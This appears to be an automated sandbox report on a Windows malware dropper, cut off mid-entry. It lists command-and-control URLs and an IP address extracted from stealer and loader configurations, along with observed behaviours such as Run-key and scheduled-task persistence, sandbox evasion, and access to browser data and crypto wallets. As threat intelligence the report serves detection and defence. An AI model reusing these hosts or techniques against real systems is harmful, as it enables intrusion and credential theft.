Analysis
-
max time kernel
95s -
max time network
171s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
10-03-2022 14:03
Static task
static1
Behavioral task
behavioral1
Sample
607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe
Resource
win10v2004-en-20220113
General
-
Target
607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe
-
Size
8.1MB
-
MD5
113b2c45c756b171c108b8b5d60dc0cb
-
SHA1
0fdf20b51c4cc246e323ca985fbcd379b4807ab2
-
SHA256
607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7
-
SHA512
2401da89351bdc2c58c6b1187194d825f813dbbb023e33996803e265065abc7c623dd80d28540aa1a0127a843e5d82bbdac34464221191a97ef83833dd0c2627
Malware Config
Extracted
socelars
http://www.iyiqian.com/
http://www.xxhufdc.top/
http://www.uefhkice.xyz/
http://www.fcektsy.top/
https://sa-us-bucket.s3.us-east-2.amazonaws.com/asdhjk/
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2020
http://varmisende.com/upload/
http://fernandomayol.com/upload/
http://nextlytm.com/upload/
http://people4jan.com/upload/
http://asfaltwerk.com/upload/
Extracted
redline
dadad123
86.107.197.196:63065
-
auth_value
dd4834614a3ac04a7b90791c224626a2
Extracted
vidar
50.6
937
https://mas.to/@s4msalo
https://koyu.space/@samsa2l
-
profile_id
937
Signatures
-
DcRat 21 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
Processes:
schtasks.exeschtasks.exe607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exeschtasks.exeschtasks.exeNetdhcpsvcDriverintocrt.exeFiles.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeGraphics.exeschtasks.exeschtasks.exeschtasks.exepid process 5008 schtasks.exe 3684 schtasks.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation 607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe 2000 schtasks.exe 1072 schtasks.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Documents and Settings\\explorer.exe\"" NetdhcpsvcDriverintocrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.ex" Files.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sihost = "\"C:\\Netdhcpsvc\\sihost.exe\"" NetdhcpsvcDriverintocrt.exe 1380 schtasks.exe 5068 schtasks.exe 5216 schtasks.exe 3536 schtasks.exe 4200 schtasks.exe 4544 schtasks.exe 2776 schtasks.exe 2160 schtasks.exe 4344 schtasks.exe Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BrokenWater = "\"C:\\Windows\\rss\\csrss.exe\"" Graphics.exe 2332 schtasks.exe 1196 schtasks.exe 4960 schtasks.exe -
Glupteba Payload 4 IoCs
Processes:
resource yara_rule behavioral2/memory/3944-174-0x0000000002EE0000-0x0000000003807000-memory.dmp family_glupteba behavioral2/memory/3944-175-0x0000000000400000-0x0000000002584000-memory.dmp family_glupteba behavioral2/memory/4692-179-0x0000000000400000-0x0000000002584000-memory.dmp family_glupteba behavioral2/memory/1568-185-0x0000000000400000-0x0000000002584000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
-
Process spawned unexpected child process 11 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rUNdlL32.eXeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4964 3404 rUNdlL32.eXe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1380 3404 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3684 3404 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4544 3404 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2776 3404 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1072 3404 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1196 3404 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3536 3404 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2160 3404 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2332 3404 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1660 3404 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
Processes:
resource yara_rule C:\Users\Admin\Pictures\Adobe Films\GjqJZ2_aVPLTP4_PI3IJUpKf.exe family_redline behavioral2/memory/4296-228-0x0000000000EC0000-0x0000000000EE0000-memory.dmp family_redline C:\Users\Admin\Pictures\Adobe Films\GjqJZ2_aVPLTP4_PI3IJUpKf.exe family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 4 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Install.exe family_socelars C:\Users\Admin\AppData\Local\Temp\Install.exe family_socelars C:\Users\Admin\Pictures\Adobe Films\ikj0nXK63Ad1yKimPNaQT2y7.exe family_socelars C:\Users\Admin\Pictures\Adobe Films\ikj0nXK63Ad1yKimPNaQT2y7.exe family_socelars -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
svchost.exedescription pid process target process PID 1864 created 3944 1864 svchost.exe Graphics.exe PID 1864 created 1568 1864 svchost.exe csrss.exe -
OnlyLogger Payload 4 IoCs
Processes:
resource yara_rule behavioral2/memory/384-235-0x0000000000400000-0x0000000000492000-memory.dmp family_onlylogger behavioral2/memory/384-234-0x0000000000740000-0x0000000000784000-memory.dmp family_onlylogger behavioral2/memory/1444-295-0x0000000000790000-0x00000000007D4000-memory.dmp family_onlylogger behavioral2/memory/1444-297-0x0000000000400000-0x0000000000492000-memory.dmp family_onlylogger -
Vidar Stealer 2 IoCs
Processes:
resource yara_rule behavioral2/memory/4988-242-0x00000000021A0000-0x000000000224C000-memory.dmp family_vidar behavioral2/memory/4988-243-0x0000000000400000-0x00000000004CE000-memory.dmp family_vidar -
Blocklisted process makes network request 1 IoCs
Processes:
schtasks.exeflow pid process 194 4296 schtasks.exe -
Downloads MZ/PE file
-
Executes dropped EXE 43 IoCs
Processes:
SoCleanInst.exemd9_1sjm.exeFolder.exeGraphics.exeUpdbdate.exeInstall.exeFiles.exepub2.exeFile.exeFolder.exejfiag3g_gg.exejfiag3g_gg.exeGraphics.execsrss.exeinjector.exeqYP5ae8gJGzlVjaxvAfG2I8a.exeexz_y5si_QKvgV12SHnOl8Vv.exec_mukBcitiv6zGCSo47ynarP.exeFQpsZZfGz3m87Jl6jcWI9bSG.exeO2asz6Aj0jmIxGOx8FZlN293.exeikj0nXK63Ad1yKimPNaQT2y7.exe0wAdZf4lpfzXIpVqVgHL8rW_.exeFJjQVURla01Xh9fpC6JaU94b.exeekfdxVPEJxh3DEsyozUTNiCv.exeRcy3rf9yZ0fpvi47hqv6iRFs.exeGjqJZ2_aVPLTP4_PI3IJUpKf.exealUpx83J0MdcnebF4CuYOIst.exeCQPxSqqh31frdIRtYHOHcDzh.exeTsgtelzQlR8yszDLuNQJXLZi.exek93jCTkUiMxXJrGKLIDgegDv.exe7IvlM80nh6MBRPFCXBxzF_BS.exeDP8IfkWhlAypXNjWbEMYhZ4_.exeInstall.exeInstall.exeyXXvNULregFXMltBKmOl3yOn.exe9eijeUrJt5HFc5qUQ01Ar1rO.exeNetdhcpsvcDriverintocrt.exeOGaewSexDdcUewGNh9MbzlbL.exe3QWDJbD9gA1edvmrqjw4wa7y.exeEz3PxgX8W6KbcsaZX7zmFHWY.exeSqxEUWFAHrHCWdtUp5Jt44Jq.exeLVScHASJYvW4eC6e8OuZpyLG.exeNetdhcpsvcDriverintocrt.exepid process 2760 SoCleanInst.exe 4772 md9_1sjm.exe 5044 Folder.exe 3944 Graphics.exe 404 Updbdate.exe 4692 Install.exe 4888 Files.exe 4212 pub2.exe 4436 File.exe 1396 Folder.exe 2040 jfiag3g_gg.exe 1176 jfiag3g_gg.exe 4692 Graphics.exe 1568 csrss.exe 1156 injector.exe 1108 qYP5ae8gJGzlVjaxvAfG2I8a.exe 2712 exz_y5si_QKvgV12SHnOl8Vv.exe 1440 c_mukBcitiv6zGCSo47ynarP.exe 4988 FQpsZZfGz3m87Jl6jcWI9bSG.exe 4656 O2asz6Aj0jmIxGOx8FZlN293.exe 4004 ikj0nXK63Ad1yKimPNaQT2y7.exe 384 0wAdZf4lpfzXIpVqVgHL8rW_.exe 2520 FJjQVURla01Xh9fpC6JaU94b.exe 3020 ekfdxVPEJxh3DEsyozUTNiCv.exe 3508 Rcy3rf9yZ0fpvi47hqv6iRFs.exe 4296 GjqJZ2_aVPLTP4_PI3IJUpKf.exe 2788 alUpx83J0MdcnebF4CuYOIst.exe 836 CQPxSqqh31frdIRtYHOHcDzh.exe 624 TsgtelzQlR8yszDLuNQJXLZi.exe 828 k93jCTkUiMxXJrGKLIDgegDv.exe 4448 7IvlM80nh6MBRPFCXBxzF_BS.exe 1920 DP8IfkWhlAypXNjWbEMYhZ4_.exe 2996 Install.exe 632 Install.exe 3936 yXXvNULregFXMltBKmOl3yOn.exe 4184 9eijeUrJt5HFc5qUQ01Ar1rO.exe 4216 NetdhcpsvcDriverintocrt.exe 1980 OGaewSexDdcUewGNh9MbzlbL.exe 1444 3QWDJbD9gA1edvmrqjw4wa7y.exe 4080 Ez3PxgX8W6KbcsaZX7zmFHWY.exe 4684 SqxEUWFAHrHCWdtUp5Jt44Jq.exe 4132 LVScHASJYvW4eC6e8OuZpyLG.exe 1496 NetdhcpsvcDriverintocrt.exe -
Modifies Windows Firewall 1 TTPs
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\Pictures\Adobe Films\7IvlM80nh6MBRPFCXBxzF_BS.exe upx C:\Users\Admin\Pictures\Adobe Films\7IvlM80nh6MBRPFCXBxzF_BS.exe upx -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 11 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Folder.exeFile.exec_mukBcitiv6zGCSo47ynarP.exeWScript.exeyXXvNULregFXMltBKmOl3yOn.exeFQpsZZfGz3m87Jl6jcWI9bSG.exe0wAdZf4lpfzXIpVqVgHL8rW_.exe607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exeNetdhcpsvcDriverintocrt.exeInstall.exeFJjQVURla01Xh9fpC6JaU94b.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation Folder.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation File.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation c_mukBcitiv6zGCSo47ynarP.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation yXXvNULregFXMltBKmOl3yOn.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation FQpsZZfGz3m87Jl6jcWI9bSG.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation 0wAdZf4lpfzXIpVqVgHL8rW_.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation 607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation NetdhcpsvcDriverintocrt.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation FJjQVURla01Xh9fpC6JaU94b.exe -
Loads dropped DLL 3 IoCs
Processes:
rundll32.exeFQpsZZfGz3m87Jl6jcWI9bSG.exepid process 3568 rundll32.exe 4988 FQpsZZfGz3m87Jl6jcWI9bSG.exe 4988 FQpsZZfGz3m87Jl6jcWI9bSG.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 11 IoCs
Processes:
Files.exeGraphics.exeNetdhcpsvcDriverintocrt.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.ex" Files.exe Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BrokenWater = "\"C:\\Windows\\rss\\csrss.exe\"" Graphics.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Documents and Settings\\explorer.exe\"" NetdhcpsvcDriverintocrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Documents and Settings\\cmd.exe\"" NetdhcpsvcDriverintocrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OfficeClickToRun = "\"C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RINTL.nb-no\\OfficeClickToRun.exe\"" NetdhcpsvcDriverintocrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GjqJZ2_aVPLTP4_PI3IJUpKf = "\"C:\\odt\\GjqJZ2_aVPLTP4_PI3IJUpKf.exe\"" NetdhcpsvcDriverintocrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sihost = "\"C:\\Netdhcpsvc\\sihost.exe\"" NetdhcpsvcDriverintocrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Windows\\System32\\wbem\\WUDFxUninstall\\WmiPrvSE.exe\"" NetdhcpsvcDriverintocrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sihost = "\"C:\\Windows\\System32\\mfreadwrite\\sihost.exe\"" NetdhcpsvcDriverintocrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Windows\\System32\\iscsied\\fontdrvhost.exe\"" NetdhcpsvcDriverintocrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Files = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\wctD721\\Files.exe\"" NetdhcpsvcDriverintocrt.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
md9_1sjm.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md9_1sjm.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 10 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 109 ipinfo.io 112 api.db-ip.com 113 api.db-ip.com 195 ipinfo.io 199 api.db-ip.com 14 ip-api.com 222 ipinfo.io 223 ipinfo.io 225 api.db-ip.com 108 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Drops file in System32 directory 7 IoCs
Processes:
NetdhcpsvcDriverintocrt.exeInstall.exedescription ioc process File created C:\Windows\System32\wbem\WUDFxUninstall\24dbde2999530e NetdhcpsvcDriverintocrt.exe File created C:\Windows\System32\mfreadwrite\sihost.exe NetdhcpsvcDriverintocrt.exe File created C:\Windows\System32\mfreadwrite\66fc9ff0ee96c2 NetdhcpsvcDriverintocrt.exe File created C:\Windows\System32\iscsied\fontdrvhost.exe NetdhcpsvcDriverintocrt.exe File created C:\Windows\System32\iscsied\5b884080fd4f94 NetdhcpsvcDriverintocrt.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\System32\wbem\WUDFxUninstall\WmiPrvSE.exe NetdhcpsvcDriverintocrt.exe -
Drops file in Program Files directory 4 IoCs
Processes:
NetdhcpsvcDriverintocrt.exec_mukBcitiv6zGCSo47ynarP.exedescription ioc process File created C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.nb-no\OfficeClickToRun.exe NetdhcpsvcDriverintocrt.exe File created C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.nb-no\e6c9b481da804f NetdhcpsvcDriverintocrt.exe File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe c_mukBcitiv6zGCSo47ynarP.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe c_mukBcitiv6zGCSo47ynarP.exe -
Drops file in Windows directory 2 IoCs
Processes:
Graphics.exedescription ioc process File opened for modification C:\Windows\rss Graphics.exe File created C:\Windows\rss\csrss.exe Graphics.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 64 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 3028 3944 WerFault.exe Graphics.exe 3488 3944 WerFault.exe Graphics.exe 4236 3944 WerFault.exe Graphics.exe 3784 3568 WerFault.exe rundll32.exe 2104 3944 WerFault.exe Graphics.exe 2160 3944 WerFault.exe Graphics.exe 1124 3944 WerFault.exe Graphics.exe 2916 3944 WerFault.exe Graphics.exe 2000 3944 WerFault.exe Graphics.exe 3908 3944 WerFault.exe Graphics.exe 4836 3944 WerFault.exe Graphics.exe 1464 3944 WerFault.exe Graphics.exe 1848 3944 WerFault.exe Graphics.exe 2040 3944 WerFault.exe Graphics.exe 2204 3944 WerFault.exe Graphics.exe 2988 3944 WerFault.exe Graphics.exe 5028 3944 WerFault.exe Graphics.exe 3464 3944 WerFault.exe Graphics.exe 4988 3944 WerFault.exe Graphics.exe 1268 3944 WerFault.exe Graphics.exe 384 3944 WerFault.exe Graphics.exe 3020 3944 WerFault.exe Graphics.exe 1848 4692 WerFault.exe Graphics.exe 2620 4692 WerFault.exe Graphics.exe 2212 4692 WerFault.exe Graphics.exe 1936 4692 WerFault.exe Graphics.exe 4816 4692 WerFault.exe Graphics.exe 2348 4692 WerFault.exe Graphics.exe 2600 4692 WerFault.exe Graphics.exe 412 4692 WerFault.exe Graphics.exe 4472 4692 WerFault.exe Graphics.exe 3332 4692 WerFault.exe Graphics.exe 1992 4692 WerFault.exe Graphics.exe 3568 4692 WerFault.exe Graphics.exe 4964 4692 WerFault.exe Graphics.exe 4632 4692 WerFault.exe Graphics.exe 1876 4692 WerFault.exe Graphics.exe 3860 4692 WerFault.exe Graphics.exe 1196 1568 WerFault.exe csrss.exe 1364 1568 WerFault.exe csrss.exe 4924 1568 WerFault.exe csrss.exe 5080 1568 WerFault.exe csrss.exe 4852 1568 WerFault.exe csrss.exe 2732 1568 WerFault.exe csrss.exe 1268 1568 WerFault.exe csrss.exe 4236 1568 WerFault.exe csrss.exe 2432 1568 WerFault.exe csrss.exe 1080 1568 WerFault.exe csrss.exe 1440 1568 WerFault.exe csrss.exe 1196 1568 WerFault.exe csrss.exe 3508 1568 WerFault.exe csrss.exe 1704 1568 WerFault.exe csrss.exe 2420 1568 WerFault.exe csrss.exe 3292 1568 WerFault.exe csrss.exe 1920 1568 WerFault.exe csrss.exe 3536 1568 WerFault.exe csrss.exe 2884 1568 WerFault.exe csrss.exe 3576 1568 WerFault.exe csrss.exe 3516 1568 WerFault.exe csrss.exe 2620 1568 WerFault.exe csrss.exe 1152 1568 WerFault.exe csrss.exe 1936 1568 WerFault.exe csrss.exe 2772 1568 WerFault.exe csrss.exe 3860 2712 WerFault.exe exz_y5si_QKvgV12SHnOl8Vv.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
pub2.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pub2.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pub2.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pub2.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
FQpsZZfGz3m87Jl6jcWI9bSG.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString FQpsZZfGz3m87Jl6jcWI9bSG.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 FQpsZZfGz3m87Jl6jcWI9bSG.exe -
Creates scheduled task(s) 1 TTPs 16 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 5216 schtasks.exe 5008 schtasks.exe 2776 schtasks.exe 4344 schtasks.exe 5068 schtasks.exe 1072 schtasks.exe 3536 schtasks.exe 2160 schtasks.exe 4200 schtasks.exe 1380 schtasks.exe 1196 schtasks.exe 2332 schtasks.exe 4960 schtasks.exe 2000 schtasks.exe 3684 schtasks.exe 4544 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 4116 timeout.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
Processes:
tasklist.exetasklist.exepid process 5008 tasklist.exe 3664 tasklist.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
Install.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Kills process with taskkill 6 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 4996 taskkill.exe 3432 taskkill.exe 1904 taskkill.exe 1408 taskkill.exe 4852 taskkill.exe 2760 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
Graphics.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2451 = "Saint Pierre Daylight Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2941 = "Sao Tome Daylight Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3052 = "Qyzylorda Standard Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1842 = "Russia TZ 4 Standard Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2892 = "Sudan Standard Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" Graphics.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local 